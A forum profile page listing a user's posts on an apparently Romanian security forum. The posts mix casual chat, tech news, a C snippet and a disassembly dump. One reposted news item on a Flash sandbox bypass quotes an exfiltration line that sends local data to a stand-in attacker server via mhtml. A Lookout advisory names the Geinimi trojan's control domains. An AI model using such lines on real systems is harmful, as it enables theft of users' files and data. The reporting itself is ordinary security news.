Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. intai un chat in plain text. apoi adaugati setari de proxy. apoi criptare. programul ar trebui sa poata juca si rolul de server, astfel nu aveti nevoie de un server extern. parca a facut temp un chat de genul ? ii las un offline cu link catre thread.
  2. begood

    Sesiune

    in c si putin asm
  3. Tuts 4 You: Downloads / Lenas Reversing for Newbies
  4. begood

    Sesiune

    bafta ! avui o saptamana de cosmar, 4 nopti fara somn, dar au curs si banii din proiecte
  5. ioneleeeeeeeeeeeee sa ne traiesti
  6. Welcome - 27C3 public wiki
  7. Windows only: Your scanner probably came with OCR software. Chances are, though, it's both awkward and space-hogging. FreeOCR is an slim, efficient app that has just four main buttons, and performs well at converting scanned images and PDFs into edit-ready text. Since so many scanners these days come as part of an all-in-one printer/scanner/copier combo, avoiding the installation of gigantic, auto-starting, self-promoting printer drivers is something we should all strive for. FreeOCR is a great alternative if you need to occasionally rip some text from a letter or other document. The app can grab text right off the scanner, or you can feed it a PDF file. Either way, your PDF shows up in the left window, and your text is ready to edit or copy in the right. Why more OCR apps aren't like this, we can't quite say. FreeOCR is a free download for Windows systems only. Look for the download link a bit down the page. The app needs an internet connection active during installation, because it seems to be grabbing updated files from its server. FreeOCR Is a No-Hassle Scan-to-Text Converter for Windows
  8. Let me google that for you Let me google that for you
  9. Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent. Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, run within the local-with-file-system sandbox, are permitted to access local files. They are not able to access the network, so a malicious SWF applet should not be able to send local data to a remote server. However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but that this is only possible within the local area network. He has identified another protocol handler which can be used to send data to remote servers – mhtml. Mhtml is supported by default under Windows, so that, according to Rios, local data can be sent to a remote server using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);. Rios has not provided a specific demo SWF file to illustrate the problem. It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set. Flash Player sandbox can be bypassed - The H Security: News and Features
  10. bai baieti, voi v-ati gandit vreodata sa faceti un dump la traficul facut de supernova cu huburile ?
  11. era clar ca e supernova "hexat" hai sa-i zicem supernova reloaded cu interfata frumusica macar ai huburi vulnerabile ? sau te-ai pus tu sa populezi ?
  12. te-o ajutat mish ?
  13. bun venit sa nu te opresti doar la un singur post.
  14. IBM researchers today revealed a previously unknown aspect of key physics inside Racetrack memory -- a new technology design which stands to improve memory capabilities within mobile phones, laptop computers and business-class servers. This new class of memory could enable devices to store much more information - as much as a factor of 100 times greater - while using much less energy than today's designs. The Racetrack memory project -- which started in IBM's Research labs only six years ago -- flips the current memory paradigm on its head. Instead of making computers seek out the data it needs – as is the case in traditional computing systems – IBM’s Racetrack memory automatically moves data to where it can be used, sliding magnetic bits back and forth along nanowire "racetracks." This technique would allow electronic manufacturers to design a portable device capable of storing all the movies produced worldwide in a given year with room to spare. Digital data is typically stored in magnetic hard disk drives, which are low-cost but slow due to their moving parts, or in solid state memory such as Flash memory, which are faster but more expensive. Racetrack memory aims to combine the best attributes of these two types of devices by storing data as magnetic regions – also called domains – in racetracks just a few tens of nanometers wide. The new understanding, revealed today in the journal Science, allows the precise control of the placement of these domains, which the IBM team has proven can act as nano-sized data keepers that can not only store at least 100 times more memory than today's techniques, but can be accessed at much greater speeds. By controlling electrical pulses in the device, the scientists can move these domain walls at speeds of hundreds of miles per hour and then stop them precisely at the position needed -- allowing massive amounts of stored information to be accessed in less than a billionth of a second. The full scientific details of the discovery can be read in the scientific paper. In short, the IBM scientists were the first to measure the time and distance of domain wall acceleration and deceleration in response to electric current pulses, which is how digital information is moved and processed in Racetrack memory. This not only gives scientists an unprecedented understanding and control over the magnetic movements inside these devices but also advances IBM’s Racetrack memory -- driving it closer to marketplace viability. “We discovered that domain walls don't hit peak acceleration as soon as the current is turned on, and that it takes them exactly the same time and distance to hit peak acceleration as it does to decelerate and eventually come to a stop,” said Dr. Stuart Parkin, an IBM Fellow at IBM Research – Almaden. “This was previously undiscovered in part because it was not clear whether the domain walls actually had mass, and how the effects of acceleration and deceleration could exactly compensate one another. Now we know domain walls can be positioned precisely along the racetracks simply by varying the length of the current pulses even though the walls have mass”. To achieve the densest and fastest possible memory, the domain walls inside the device must be moved at speeds of hundreds of miles per hour to atomically precise positions along the tracks. These timescales (tens of nanoseconds) and distances (micrometers) are surprisingly long, especially since previous experiments had shown no evidence for acceleration and deceleration for domain walls driven along smooth racetracks with current. A closer look at Racetrack For nearly fifty years, scientists have explored the possibility of storing information in magnetic domain walls, which are the boundaries between magnetic regions or "domains" in magnetic materials. Until now, manipulating domain walls was expensive, complex and used significant power to generate the fields necessary to do so. In a proof of concept paper in 2008(i) IBM researchers were the first to demonstrate the potential of Racetrack memory, showing how the use of spin momentum considerably simplifies the memory device. The details and results of this research effort will be reported in the December 24, 2010 issue of Science. The paper is titled, “Dynamics of magnetic domain walls under their own inertia,” and is authored by Luc Thomas, Rai Moriya, Charles Rettner and Stuart Parkin of IBM Research – Almaden. More information: (i) Hayashi, M., Thomas, L., Moriya, R., Rettner, C. & Parkin, S. S. P. Current-Controlled Magnetic Domain-Wall Nanowire Shift Register. Science 320, 209-211 (2008) For more information about Racetrack Memory, please visit: http://www.almaden … d/?racetrack Provided by IBM
  15. ai ochi si imaginatie
  16. The Threat: A new Trojan affecting Android devices has recently emerged in China. Dubbed “Geinimi” based on its first known incarnation, this Trojan can compromise a significant amount of personal data on a user’s phone and send it to remote servers. The most sophisticated Android malware we’ve seen to date, Geinimi is also the first Android malware in the wild that displays botnet-like capabilities. Once the malware is installed on a user’s phone, it has the potential to receive commands from a remote server that allow the owner of that server to control the phone. Geinimi is effectively being “grafted” onto repackaged versions of legitimate applications, primarily games, and distributed in third-party Chinese Android app markets. The affected applications request extensive permissions over and above the set that is requested by their legitimate original versions. Though the intent of this Trojan isn’t entirely clear, the possibilities for intent range from a malicious ad-network to an attempt to create an Android botnet. Lookout has already delivered an update for its Android users to protect them against known instances of the Trojan. If you are already a Lookout user (free or premium), you are protected and no action is needed. How it Works: When a host application containing Geinimi is launched on a user’s phone, the Trojan runs in the background and collects significant information that can compromise a user’s privacy. The specific information it collects includes location coordinates and unique identifiers for the device (IMEI) and SIM card (IMSI). At five minute intervals, Geinimi attempts to connect to a remote server using one of ten embedded domain names. A subset of the domain names includes www.widifu.com, www.udaore.com, www.frijd.com, www.islpast.com and www.piajesj.com. If it connects, Geinimi transmits collected device information to the remote server. Though we have seen Geinimi communicate with a live server and transmit device data, we have yet to observe a fully operational control server sending commands back to the Trojan. Our analysis of Geinimi’s code is ongoing but we have evidence of the following capabilities: Send location coordinates (fine location) Send device identifiers (IMEI and IMSI) Download and prompt the user to install an app Prompt the user to uninstall an app Enumerate and send a list of installed apps to the server While Geinimi can remotely initiate an app to be downloaded or uninstalled on a phone, a user still needs to confirm the installation or uninstallation. Geinimi’s author(s) have raised the sophistication bar significantly over and above previously observed Android malware by employing techniques to obfuscate its activities. In addition to using an off-the-shelf bytecode obfuscator, significant chunks of command-and-control data are encrypted. While the techniques were easily identified and failed to thwart analysis, they did substantially increase the level of effort required to analyze the malware. The Lookout Security team is continuing to analyze capabilities of new and existing Geinimi variants and will provide more information as we uncover it. Who is affected? Currently we only have evidence that Geinimi is distributed through third-party Chinese app stores. To download an app from a third-party app store, Android users need to enable the installation of apps from “Unknown sources” (often called “sideloading”). Geinimi could be packaged into applications for Android phones in other geographic regions. We have not seen any applications compromised by the Geinimi Trojan in the official Google Android Market. There are a number of applications—typically games—we have seen repackaged with the Geinimi Trojan and posted in Chinese app stores, including Monkey Jump 2, Sex Positions, President vs. Aliens, City Defense and Baseball Superstars 2010. It is important to remember that even though there are instances of the games repackaged with the Trojan, the original versions available in the official Google Android Market have not been affected. As the Lookout team finds more variants of the Geinimi Trojan grafted onto legitimate applications, we’ll provide timely updates. As stated above, Lookout has already delivered an update for its Android users to protect them against known instances of the Trojan. How to Stay Safe: Only download applications from trusted sources, such as reputable application markets. Remember to look at the developer name, reviews, and star ratings. Always check the permissions an app requests. Use common sense to ensure that the permissions an app requests match the features the app provides. Be aware that unusual behavior on your phone could be a sign that your phone is infected. Unusual behaviors include: unknown applications being installed without your knowledge, SMS messages being automatically sent to unknown recipients, or phone calls automatically being placed without you initiating them. Download a mobile security app for your phone that scans every app you download. Lookout users automatically receive protection against this Trojan. With the discovery of this new malware, it is more important than ever to pay attention to what you’re downloading. Stay alert and ensure that you trust every app you download. Stay tuned for more details on this threat. The Official Lookout Blog | Security Alert: Geinimi, Sophisticated New Android Trojan Found in Wild
  17. CPU Disasm Address Hex dump Command Comments 00C05910 FF15 EC60C000 CALL DWORD PTR DS:[0C060EC] 00C05916 85C0 TEST EAX,EAX 00C05918 74 1B JE SHORT 00C05935 00C0591A 89C3 MOV EBX,EAX 00C0591C 68 3380C000 PUSH OFFSET 00C08033 ; ASCII "DecodePointer" 00C05921 56 PUSH ESI 00C05922 FF15 EC60C000 CALL DWORD PTR DS:[0C060EC] 00C05928 74 0B JE SHORT 00C05935 00C0592A 891D 1080C000 MOV DWORD PTR DS:[0C08010],EBX 00C05930 A3 1480C000 MOV DWORD PTR DS:[0C08014],EAX 00C05935 56 PUSH ESI 00C05936 FF15 E860C000 CALL DWORD PTR DS:[0C060E8] 00C0593C 5B POP EBX 00C0593D 5E POP ESI 00C0593E 58 POP EAX 00C0593F C3 RETN 00C05940 55 PUSH EBP 00C05941 89E5 MOV EBP,ESP 00C05943 E8 9FFFFFFF CALL 00C058E7 00C05948 5D POP EBP 00C05949 ^ FF25 1080C000 JMP DWORD PTR DS:[0C08010] 00C0594F 55 PUSH EBP 00C05950 89E5 MOV EBP,ESP 00C05952 E8 90FFFFFF CALL 00C058E7 00C05957 5D POP EBP 00C05958 ^ FF25 1480C000 JMP DWORD PTR DS:[0C08014] 00C0595E 55 PUSH EBP 00C0595F 8BEC MOV EBP,ESP 00C05961 56 PUSH ESI 00C05962 57 PUSH EDI 00C05963 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 00C05966 8B75 0C MOV ESI,DWORD PTR SS:[EBP+0C] 00C05969 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8] 00C0596C F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ 00C0596E 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00C05971 5F POP EDI 00C05972 5E POP ESI 00C05973 5D POP EBP 00C05974 C3 RETN 00C05975 55 PUSH EBP 00C05976 8BEC MOV EBP,ESP 00C05978 57 PUSH EDI 00C05979 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 00C0597C 8A45 0C MOV AL,BYTE PTR SS:[EBP+0C] 00C0597F 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8] 00C05982 F3:AA REP STOS BYTE PTR ES:[EDI] 00C05984 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00C05987 5F POP EDI 00C05988 5D POP EBP 00C05989 C3 RETN 00C0598A CC INT3 00C0598B C3 RETN 00C0598C FF7424 04 PUSH DWORD PTR SS:[ESP+4] 00C05990 6A 00 PUSH 0 00C05992 FF15 C460C000 CALL DWORD PTR DS:[0C060C4] 00C05998 50 PUSH EAX 00C05999 FF15 C060C000 CALL DWORD PTR DS:[0C060C0] 00C0599F C3 RETN 00C059A0 FF7424 04 PUSH DWORD PTR SS:[ESP+4] 00C059A4 6A 00 PUSH 0 00C059A6 FF15 C460C000 CALL DWORD PTR DS:[0C060C4] 00C059AC 50 PUSH EAX 00C059AD FF15 C860C000 CALL DWORD PTR DS:[0C060C8] 00C059B3 C3 RETN 00C059B4 8D4424 0C LEA EAX,[ESP+0C] 00C059B8 50 PUSH EAX 00C059B9 FF7424 0C PUSH DWORD PTR SS:[ESP+0C] 00C059BD FF7424 0C PUSH DWORD PTR SS:[ESP+0C] 00C059C1 FF15 1C61C000 CALL DWORD PTR DS:[0C0611C] 00C059C7 C3 RETN 00C059C8 55 PUSH EBP 00C059C9 8BEC MOV EBP,ESP 00C059CB 83EC 44 SUB ESP,44 00C059CE 56 PUSH ESI 00C059CF FF15 D460C000 CALL DWORD PTR DS:[0C060D4] 00C059D5 8BF0 MOV ESI,EAX 00C059D7 8A06 MOV AL,BYTE PTR DS:[ESI] 00C059D9 3C 22 CMP AL,22 00C059DB 75 14 JNE SHORT 00C059F1 00C059DD 8A46 01 MOV AL,BYTE PTR DS:[ESI+1] 00C059E0 46 INC ESI 00C059E1 84C0 TEST AL,AL 00C059E3 74 04 JE SHORT 00C059E9 00C059E5 3C 22 CMP AL,22 00C059E7 ^ 75 F4 JNE SHORT 00C059DD 00C059E9 803E 22 CMP BYTE PTR DS:[ESI],22 00C059EC 75 0D JNE SHORT 00C059FB 00C059EE 46 INC ESI 00C059EF EB 0A JMP SHORT 00C059FB 00C059F1 3C 20 CMP AL,20 asta vrei ? http://pastebin.com/n6sCYvwy moar editeaza-l cum vrei, daca nu vrei sa apara cuvinte ca truecrypt
  18. und ?
  19. C | #include <stdio.h> #include <math.h> #include <c - Find primes smaller than 100, from the fibonacci sequence facut in graba, fara sa-l testez. daca in while e 100, schimba cu n si citeste-l de la tastatura LE: http://pastebin.com/8HVdK1AW
  20. @wingsb pune sigla din imaginea a doua in mijloc sau gaseste-i o pozitie mai buna ... si lasa sigla din prima imagine la locul ei. (cea postata de mine) @Cipry arata cam ciudat
  21. daca ai photoshop cauta pe filelist addonul "genuine fractals" mareste cu ala. e cel mai bun.
  22. Mai am 2 invitatii, una trimisa la Ellimist
  23. din pacate nu.
  24. http://static.simpledesktops.com/desktops/2010/12/01/anon.png Vreau un wallpaper ca asta, dar sa aibe si sigla rst, ceva simplu, curat, fara flacari si chestii complicate. Care'i maestru in ale editarii ?
×
×
  • Create New...